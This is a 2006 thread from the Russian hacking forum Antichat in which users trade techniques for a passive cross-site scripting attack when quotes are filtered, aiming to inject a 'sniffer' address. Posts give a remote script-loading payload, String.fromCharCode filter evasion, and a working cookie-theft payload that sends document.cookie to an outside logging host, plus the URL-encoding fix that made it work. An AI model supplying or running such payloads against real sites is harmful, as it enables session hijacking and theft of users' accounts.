ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как можно произвести xss, если фильтруются кавычки?
  #1  
Старый 20.04.2006, 05:00
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию Как можно произвести xss, если фильтруются кавычки?

Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.

Последний раз редактировалось 1ten0.0net1; 20.04.2006 в 06:42..
 
Ответить с цитированием

  #2  
Старый 20.04.2006, 10:42
Аватар для drmist
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
По умолчанию

Одинарный ковычки тоже фильтруютя?
__________________
Никому нельзя верить...
 
Ответить с цитированием

  #3  
Старый 20.04.2006, 11:01
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)
__________________
Full DNS report
 
Ответить с цитированием

  #4  
Старый 20.04.2006, 11:14
Аватар для K[o]S
K[o]S
Новичок
Регистрация: 29.07.2005
Сообщений: 20
Провел на форуме:
357093

Репутация: 13
По умолчанию

Цитата:
Сообщение от Azazel  
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)
Ковычки могут понадобиться для того чтоб закрыть тег =)

Автор поясни какого типа XSS актив пасив мыло форум и т.д
 
Ответить с цитированием

  #5  
Старый 20.04.2006, 15:18
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Цитата:
Сообщение от Azazel  
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>
Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.
 
Ответить с цитированием

  #6  
Старый 21.04.2006, 01:46
Аватар для Xex
Xex
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041

Репутация: 50
По умолчанию

а просто тыги можешь использовать?...
ну например картинку вставить?...
Код HTML:
<img src="тут твой код или адрес снифера">
а далее можешь проверить:
Код HTML:
<script>alert(document.images[0].src)</script>
Как дальше использовать думаю разберешься...
 
Ответить с цитированием

  #7  
Старый 21.04.2006, 23:35
Аватар для Laggi
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401

Репутация: 2
По умолчанию

Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-)
Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...
 
Ответить с цитированием

  #8  
Старый 21.04.2006, 23:46
Аватар для Laggi
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401

Репутация: 2
По умолчанию

r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src% 20=%20document.images[19].src+document.cookie;</script>
К примеру не подходит
 
Ответить с цитированием

  #9  
Старый 21.04.2006, 23:49
Аватар для Laggi
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401

Репутация: 2
По умолчанию

А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю.

В виде "%ХХ" как "+" выглядит?

UPD: усе, спасибо, нашел :-) %2B - все работает

Последний раз редактировалось Laggi; 21.04.2006 в 23:52..
 
Ответить с цитированием

  #10  
Старый 24.05.2006, 13:23
Аватар для Del
Del
Новичок
Регистрация: 24.01.2005
Сообщений: 6
Провел на форуме:
10023

Репутация: 0
По умолчанию

так как запрос без кавычек выглядит?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
№2_ Как увеличить производительность Windows Elekt Windows 34 07.05.2010 15:16
Как восстановить нечитающийся Cd? novichok Аппаратное обеспечение 8 02.05.2007 12:15
Фразы о жизни novichok Болталка 10 15.07.2006 21:04
Lineage 2 Chronicle 4 Inferno Болталка 1 02.02.2006 16:44
Что ломать? Almight Чаты 3 09.02.2004 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ